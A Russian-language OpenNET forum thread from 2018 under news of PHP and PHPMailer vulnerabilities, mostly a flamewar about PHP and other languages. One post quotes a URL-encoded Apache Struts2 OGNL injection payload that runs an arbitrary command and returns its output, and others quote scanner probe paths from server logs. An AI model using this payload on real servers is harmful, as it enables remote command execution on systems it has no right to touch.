The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Уязвимости в PHP и PHPMailer, opennews (ok), 08-Дек-18, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


16. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от Аноним (7), 08-Дек-18, 14:14 
ErlangVM, Rust, Python3, Golang, NodeJS, & Ruby.
Ответить | Правка | Наверх | Cообщить модератору

17. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от Vitaliy Blatsemail (?), 08-Дек-18, 14:34 
> ErlangVM, Rust, Python3, Golang, NodeJS, & Ruby.

И шо, уже есть нормальные известные проекты на этом?)

Ответить | Правка | Наверх | Cообщить модератору

20. "Уязвимости в PHP и PHPMailer"  –1 +/
Сообщение от Аноним (20), 08-Дек-18, 16:05 
Есть. Только никто не признаётся, на чём его проект, а то мамкины хацкеры, если узнают, перестанут бомбить их сайты типовыми эксплойтами для PHP, скачанными из сети. А это такой источник лулзов - вы даже не представляете!
Ответить | Правка | Наверх | Cообщить модератору

22. "Уязвимости в PHP и PHPMailer"  +1 +/
Сообщение от пох (?), 08-Дек-18, 16:17 
> а то мамкины хацкеры, если узнают, перестанут бомбить их сайты типовыми эксплойтами для PHP,
> скачанными из сети

скачают типовой эксплойт для поделок на ror, node и что там у вас еще за хлам, а, ну да, свежие баги в жанге забыли, и лулзы кончатся, начнутся поиски "как убрать чорного властелина с сайта".

вот, например, не-такие-как-все приходили:
/CFIDE/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/filemanager.cfm" failed (2: No such file or directory)
(сорри, ребята, но нет у меня гармо... coldfusion'а - сюда вот идите, там есть: https://apps.wharton.upenn.edu/cf_scripts/scripts/ajax/ckedi.../)

Ответить | Правка | Наверх | Cообщить модератору

24. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от Аноним (24), 08-Дек-18, 16:48 
ROP Gadget в твою вордпреску, скомпилят как модуль ядра и подгрузят.
Ответить | Правка | Наверх | Cообщить модератору

31. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от Аноним (31), 08-Дек-18, 18:58 
> ror, node ... в жанге

Это все варианты, которые вам известны?

Ответить | Правка | К родителю #22 | Наверх | Cообщить модератору

34. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от пох (?), 08-Дек-18, 21:49 
не, это что я сходу у себя в логе нашел, помимо coldfusion'а и миллиона...чего это за зомбонет, я забыл, из хоменасов-то, весной появился? Судя по .cgi - на прекрасной сишечке ;-)

жабы вот не видно что-то - то ли с regex неугадал, то ли не сезон, пакованный лог лень шерстить

Ответить | Правка | Наверх | Cообщить модератору

39. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от Sw00p aka Jerom (?), 09-Дек-18, 01:10 
поищи че нить такое ))

%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D

Ответить | Правка | Наверх | Cообщить модератору

43. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от пох (?), 09-Дек-18, 09:28 
а, точно, cpyt-c же ж. Не, такие продвинутые ко мне редко ходют, им проще подавай:

GET /struts2-rest-showcase/orders.xhtml
а вот вообще прекрасное:
GET /struts-cookbook/processSimple.do

;-)

кто там авторов безобидного js-аплоадера ругал за демо-скрипты без лишних проверок? Мощные жабисты, как видим, тоже не брезгуют. А админы ничерта не понимают в этой жабе, попросили их поставить, поставили.

Ответить | Правка | Наверх | Cообщить модератору

23. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от Vitaliy Blatsemail (?), 08-Дек-18, 16:39 
> Есть. Только никто не признаётся, на чём его проект, а то мамкины
> хацкеры, если узнают, перестанут бомбить их сайты типовыми эксплойтами для PHP,
> скачанными из сети. А это такой источник лулзов - вы даже
> не представляете!

Значит нету. Что в принципе и требовалось доказать.
Почти все фронтенды пишутся на PHP, потому что он одновременно отвечает сразу нескольким требованиям - легкости (а значит программисты на нем более дешевле), распространенности (а значит в сети много информации о нем), поддержке (а значит он может работать на чем угодно), относительной скорости работы (хотя для фронтенда она особо и не нужна), универсальности (а значит к нему написано много плагинов и фреймворков).

Почти все конторы где работает больше пяти анонимусов, выставляют требования к проекту чтоб он РАБОТАЛ, чтоб он обошелся ДЕШЕВЛЕ, опционально чтоб его потом могло поддерживать более чем три человека на всю страну. Требований "чтоб был написан только на Ruby" я еще не видел за 10 лет работы в этой сфере.

Разумеется ты конечно начнешь приводить аргументы типа "Ruby удобнее", "Python читабельнее", "Go секюрнее", но PHP не зря стал таким распространенным обогнав Perl, и чтобы ТВОЙ язык стали считать нормальным - он не должен быть удобнее, или читабельнее, или секюрнее. Он должен быть лучше одновременно во всем и сразу.

Ответить | Правка | К родителю #20 | Наверх | Cообщить модератору

29. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от Аноним (31), 08-Дек-18, 18:51 
> чтоб он РАБОТАЛ

Угу. "Чтоб он РАБОТАЛ" так, как нужно заказчику не только на момент приёмки от "студии веб-дизайна", но и через месяц, и через год. А когда "проект" впихивает юзерам малварь, сливает налево базу пользователей, майнит крипту на оплаченных заказчиком мощностях и т.д. - это не называется "чтоб он РАБОТАЛ".

Ответить | Правка | Наверх | Cообщить модератору

36. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от пох (?), 08-Дек-18, 21:54 
через год этот заказчик уже банкрот и сдает квартиру, благо ипотеку выплатил в жырном 2008м, когда деньги падали с неба даже в совершенно бестолковые руки.

так что пусть помайнит - домен и хостинг оплачены со скидкой за двухгодичную разовую оплату, все равно пропадают.

Ответить | Правка | Наверх | Cообщить модератору

42. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от Аноним (41), 09-Дек-18, 08:26 
Так не бывает. Поддерживать и исправлять уязвимости нужно постоянно и на любом языке.
Ответить | Правка | К родителю #29 | Наверх | Cообщить модератору

64. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от Аноним (64), 09-Дек-18, 14:13 
Дык отож!
Только одно дело раз в день по диагонали просматривать письма от log analyser'а и почитывать рассылку от разрабов в ожидании сведений об уязвимостях (а она чуть более чем полностью состоит из вопросов нубов "как мне сделать"), а другое дело когда каждый месяц надо что-то править, обновлять,  накатывать, дампить-ресторить, и т.д.
Ответить | Правка | Наверх | Cообщить модератору

37. "Уязвимости в PHP и PHPMailer"  +2 +/
Сообщение от User (??), 08-Дек-18, 22:51 
>(а значит программисты на нем более дешевле),

"более дешевле", да... ПыХаПэ-культура в двух словах, ага. Портрет явления, тскзть.
За PHP Марьванна двойки не ставит - погнали, посоны!!!111

Ответить | Правка | К родителю #23 | Наверх | Cообщить модератору

85. "Уязвимости в PHP и PHPMailer"  +1 +/
Сообщение от Sw00p aka Jerom (?), 09-Дек-18, 19:46 
>>Почти все фронтенды пишутся на PHP

фронтенды на пхп не пишут :)

Ответить | Правка | К родителю #23 | Наверх | Cообщить модератору

27. "Уязвимости в PHP и PHPMailer"  +1 +/
Сообщение от Аноним84701 (ok), 08-Дек-18, 17:47 
>> ErlangVM, Rust, Python3, Golang, NodeJS, & Ruby.
> И шо, уже есть нормальные известные проекты на этом?)

Если вы ничего не слышали о CloudFlare, GitHub, dl.google и Netflix, то у меня для вас неприятные новости.

Ответить | Правка | К родителю #17 | Наверх | Cообщить модератору

44. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от пох (?), 09-Дек-18, 09:38 
>>> ErlangVM, Rust, Python3, Golang, NodeJS, & Ruby.
>> И шо, уже есть нормальные известные проекты на этом?)
> Если вы ничего не слышали о CloudFlare, GitHub, dl.google и Netflix, то
> у меня для вас неприятные новости.

окей, любитель приятных новостей - ни в какой из этих я работать не хочу, они тупые, жадные, и даже 401k matching от этих не дождешься (ну, может, если предъявить справку что ты - Оно, будет оплата препаратов, но мне как-то без надобности). Еще есть варианты, или это все?

заметим, что тут еще и ловкая подмена темы - спрашивали о проектах, доступных для эксплуатации кем-то, а вы вывалили домашние поделки для работы в огороженной сети с тыщами админов их постоянно подпирающих специально выпиленными костыликами.

Ответить | Правка | Наверх | Cообщить модератору

59. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от Аноним84701 (ok), 09-Дек-18, 13:28 
> окей, любитель приятных новостей - ни в какой из этих я работать  не хочу, они тупые, жадные, и даже 401k matching от этих не дождешься (ну, может, если предъявить справку что ты - Оно,

Держите нас в курсе! Нам ведь (почти) интересно!

> заметим, что тут еще и ловкая подмена темы - спрашивали о проектах,
> доступных для эксплуатации кем-то, а вы вывалили домашние поделки для работы

Заметим, что тут еще и ловкая подмена темы на тему о подмене темы.
Вся ветка, полностью:
>>>> где и с чем работают все эти немногочисленные хейтеры php и systemd.
>>>ErlangVM, Rust, Python3, Golang, NodeJS, & Ruby.
>> И шо, уже есть нормальные известные проекты на этом?)
> Если вы ничего не слышали о CloudFlare, GitHub, dl.google и Netflix, то у меня для вас неприятные новости.

"спрашивали о проектах, доступных для эксплуатации кем-то, а вы вывалили домашние поделки [...]"
Мне вот интересно, вы когда нибудь научитесь читать целиком, по возможности глазами (и заодно отвечать на написаное другими, а не придуманное вами)?

Ответить | Правка | Наверх | Cообщить модератору

67. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от пох (?), 09-Дек-18, 17:07 
ну ок, так и запишем - "в основном - нигде, основная ниша - внутренняя кухня аж трех громадных ентер-прайсов с сотными тысяч одних курьеров и вообще специфическими задачами и подходами к их решениям, то есть для обычных смертных == нигде"

Ответить | Правка | Наверх | Cообщить модератору

40. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от НяшМяш (ok), 09-Дек-18, 02:45 
github.com ?
Ответить | Правка | К родителю #17 | Наверх | Cообщить модератору

19. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от Аноним (19), 08-Дек-18, 16:00 
Иными словами - в основном, нигде.
Ответить | Правка | К родителю #16 | Наверх | Cообщить модератору

25. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от Аноним (24), 08-Дек-18, 16:50 
Пыхапистам виднее, ведь эти мамкины разработчики уже всему научены.
Ответить | Правка | Наверх | Cообщить модератору

26. "Уязвимости в PHP и PHPMailer"  –2 +/
Сообщение от Vitaliy Blatsemail (?), 08-Дек-18, 16:56 
> Пыхапистам виднее, ведь эти мамкины разработчики уже всему научены.

Если язык для своего понимания, требует какие-то особые скиллы и особую уличную магию, он УЖЕ НА СТАРТЕ не нужен.

Пока мамкины разработчики пишут продукты, хорошие или не очень, ты изучаешь достоинства языка. Хе.

Ответить | Правка | Наверх | Cообщить модератору

30. "Уязвимости в PHP и PHPMailer"  +1 +/
Сообщение от Аноним (31), 08-Дек-18, 18:53 
Если разработчик не имеет хотя бы минимальной подготовки и набора скиллов, он УЖЕ НА СТАРТЕ не нужет.
Ответить | Правка | Наверх | Cообщить модератору

33. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от Анонн (?), 08-Дек-18, 19:31 
> Если разработчик не имеет хотя бы минимальной подготовки и набора скиллов, он УЖЕ НА СТАРТЕ не нужет.

Осторожнее, эта братия при сильном негодовании не только бананами закидать может!


Ответить | Правка | Наверх | Cообщить модератору

35. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от пох (?), 08-Дек-18, 21:52 
как это не нужен? А кто мне будет за пиццот рублев чинить сдохший битрикс? Мне что, самому мараться?

Ответить | Правка | К родителю #30 | Наверх | Cообщить модератору

63. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от Аноним (64), 09-Дек-18, 13:45 
> битрикс

ып... ып... ып... ыбуэээ....

Ответить | Правка | Наверх | Cообщить модератору

80. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от пох (?), 09-Дек-18, 18:57 
буэ свое можешь откладывать сколько влезет, только не на мой столик - мне чтоб завтра сайт заработал, сделаешь - 500 рублей получишь.

и ведь делают же ж :-(

Ответить | Правка | Наверх | Cообщить модератору

38. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от vedronim (?), 08-Дек-18, 23:06 
Это все, что ты смог нагуглить о языках?
Ответить | Правка | К родителю #16 | Наверх | Cообщить модератору

50. "Уязвимости в PHP и PHPMailer"  +/
Сообщение от Аноним (7), 09-Дек-18, 12:15 
Erlang/Ruby -> +Elixir
+ Crystal
Nim
Elm
Dlang
Haskell
Scala
Kotlin
Swift
Ponylang
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру